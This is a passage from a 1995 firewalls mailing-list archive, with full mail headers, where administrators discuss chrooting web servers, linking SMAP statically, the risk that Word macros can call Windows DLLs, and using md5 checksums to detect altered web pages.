will prepare a simple CGI script for asking for some comment and other often requested functions. But, even for these, I have some doubt as to my skill to produce bug-free scripts. (And I have been using UNIX for close to 15 years...) Being paranoid, I am running httpd experimentally under chroot()ed environment and as NON-root users. Hence CERN server can't open previledged port number 80. I wonder if there is a tool to verify the effective uid of running programs. -- Chiaki Ishikawa ishikawa@personal-media.co.jp Personal Media Corp. Shinagawa, Tokyo, Japan 141 From firewalls-owner Mon Sep 18 06:00:30 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA14017 for firewalls-outgoing; Mon, 18 Sep 1995 05:56:15 -0700 Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA14010; Mon, 18 Sep 1995 05:56:12 -0700 Message-Id: <199509181256.FAA14010@miles.greatcircle.com> Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA296228900; Mon, 18 Sep 1995 08:55:00 -0400 Date: Mon, 18 Sep 1995 08:55:00 -0400 From: gary flynn To: firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, smith@sctc.com Subject: Re: Firewall off Mortal Kombat XIV Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: Ted Doty > > 4. Anonymity can only be prevent with good authentication, which means > crypto. ortunately, there's a standards-based approach that looks like it > will bear fruit, so we don't have to be stuck with vendor foo's proprietary > crypto solution [don't get me wrong ... I'd LOVE it if everyone rushed out > and bought up NSC's DPF. Works Great, Lasts A Long Time. But now, back to > reality]. This is not a magic bullet, just a tool to prevent anonymity from > arbitrary Internet locations. > What standards based approach are you talking about? Is this the IPSEC work? Doesn't this depend upon IPv6? If not, where can I learn more? thanks, Gary Flynn James Madison University From firewalls-owner Mon Sep 18 06:02:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA13769 for firewalls-outgoing; Mon, 18 Sep 1995 05:49:31 -0700 Received: from jet.msk.su (relay1.jet.msk.su [194.87.88.34]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA13754 for ; Mon, 18 Sep 1995 05:49:07 -0700 Received: by jet.msk.su; Mon, 18 Sep 95 16:47 GMT+4:00 Received: from tiger.jet.msk.su(193.124.4.1) by relay1.jet.msk.su id sma013933; Mon Sep 18 16:47:28 1995 Received: from jet.msk.su by jet.msk.su ; Mon, 18 Sep 95 16:47 GMT+4:00 Received: by jet.msk.su; Mon, 18 Sep 95 16:47 GMT+4:00 Message-Id: Subject: Re: Figured out why SMAP wouldn't work on BSDI... To: mikenel@netcom.com (Michael Nelson) Date: Mon, 18 Sep 1995 16:47:27 +0400 (GMT+0400) Cc: firewalls@greatcircle.com In-Reply-To: from "Michael Nelson" at Sep 16, 95 09:56:31 pm X-Pgp-Key: available on request Content-Type: text Content-Length: 898 From: "Andrew V. Kovalev" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Michael Nelson wrote: > > > Naturally I figure out why SMAP wouldn't chroot on BSDI after I post my > message here :-). > > If SMAP is compiled with the shared libraries, attempting to chroot results > in an "Operation not permitted" error. I have gotten into the habit of > modifying Makefiles to make programs compile with the shared libaries. > This usually results in a dramatically smaller binary (hard disk space is > a valuable resource here ). It broke things in this case... > IMHO linking of security-critical applications (and SMAP is one of them) with shared libraries is pretty unsafe.. It is really easy to break something while fixing another thing. I linked everything running on my firewall static, just in case. avk -- --- \/\/\/ Andrew.V.Kovalev@jet.msk.su +7-095-973-4848 office Security is like defecation - unpleasant, but alternatives are worse. From firewalls-owner Mon Sep 18 06:20:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA13504 for firewalls-outgoing; Mon, 18 Sep 1995 05:37:14 -0700 Received: from callisto.lif.icnet.uk (callisto.lif.icnet.uk [143.65.1.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA13497 for ; Mon, 18 Sep 1995 05:37:01 -0700 From: harley@icrf.icnet.uk Message-Id: <199509181237.FAA13497@miles.greatcircle.com> Received: by callisto.lif.icnet.uk; Mon, 18 Sep 1995 13:36:38 +0100 Subject: Re: Horrible thought wrt. the Word virus To: mjb@sophos.com (Matthew J Brown) Date: Mon, 18 Sep 1995 13:36:38 +0100 (BST) Cc: harley@icrf.icnet.uk (David Harley), firewalls@greatcircle.com In-Reply-To: <199509180919.KAA20930@elbereth.sophos.com> from "Matthew J Brown" at Sep 18, 95 10:19:50 am X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1435 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Word Basic is not the simple macro language many of us (including > myself until very recently) have believed. In fact, I am informed by > people I know who have developed in it, a Word Basic program can > access ANY function in ANY Windows DLL. This includes just about any > Windows system function, and, worryingly, WINSOCK.DLL. > Confirmed. "Calls are often made to Windows API ... routines, but they can be made to routines in any DLL that makes routines available for other programs" (Word Developers Kit). Furthermore, although DLLs are not supported on the Mac, Word add-in libraries (.WLL files), which are "a special kind of DLL written specifically for Word" *are*. See appendix C of the Word Developers Kit. > Therefore, all you need to break just about anyone's firewall and > internet security is to con somebody into reading a word document of > yours. > I doubt if it's *that* simple, but the possibility of a WordBASIC programmer subverting compiled MacOS and Windows add-in routines certainly seems to exist. > Word documents should henceforth be treated *EXACTLY* the same as > executables; they're nearly as powerful, and their operating > environment is damn common. > Something in that: seems to me we should be thinking about trusted and untrusted documents. I'm thinking in terms of clamping down on automacros and execute-only macros in any application which supports them. David Harley From firewalls-owner Mon Sep 18 06:30:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA14321 for firewalls-outgoing; Mon, 18 Sep 1995 06:02:32 -0700 Received: from gater4.sematech.org (GATER4.SEMATECH.ORG [192.73.53.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA14314 for ; Mon, 18 Sep 1995 06:02:29 -0700 Received: from thecount.eng.sematech.org by gater4.sematech.org (8.6.12/F-1.9) with ESMTP id IAA09852; Mon, 18 Sep 1995 08:01:14 -0500 Received: from localhost.eng.sematech.org by thecount.eng.sematech.org (8.6.12/I-1.8) with SMTP id IAA03419; Mon, 18 Sep 1995 08:01:14 -0500 Message-Id: <199509181301.IAA03419@thecount.eng.sematech.org> X-Authentication-Warning: thecount.eng.sematech.org: Host localhost.eng.sematech.org didn't use HELO protocol To: Rich cc: webserver-nt@delta.process.com, firewalls@greatcircle.com Subject: Re: Comments on a hacked server/page Date: Mon, 18 Sep 1995 08:01:05 -0500 From: "Quentin Fennessy" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message Rich writes > >At anyrate, the jist of it was his home page was "altered" through a whole in >the cern server which ran on the outside. What was altered?? The prices for >access to his services!!!!! > >How can you protect yourself from "altered" information? I mean what if > someone had changed his page to load pornographic images or > slanderous comments? Who is responsible? A tough call I know. > Rich- re:: How can you protect yourself from "altered" information? I suggest cloning Tripwire technology onto your NT system. At the very least you could compile md5 and run that regularly against your data files. If NT has a cron-equivalent you could run an md5 executable from a read-only floppy, comparing data files with their checksums on the same read-only floppy. Would you share more details on the hole in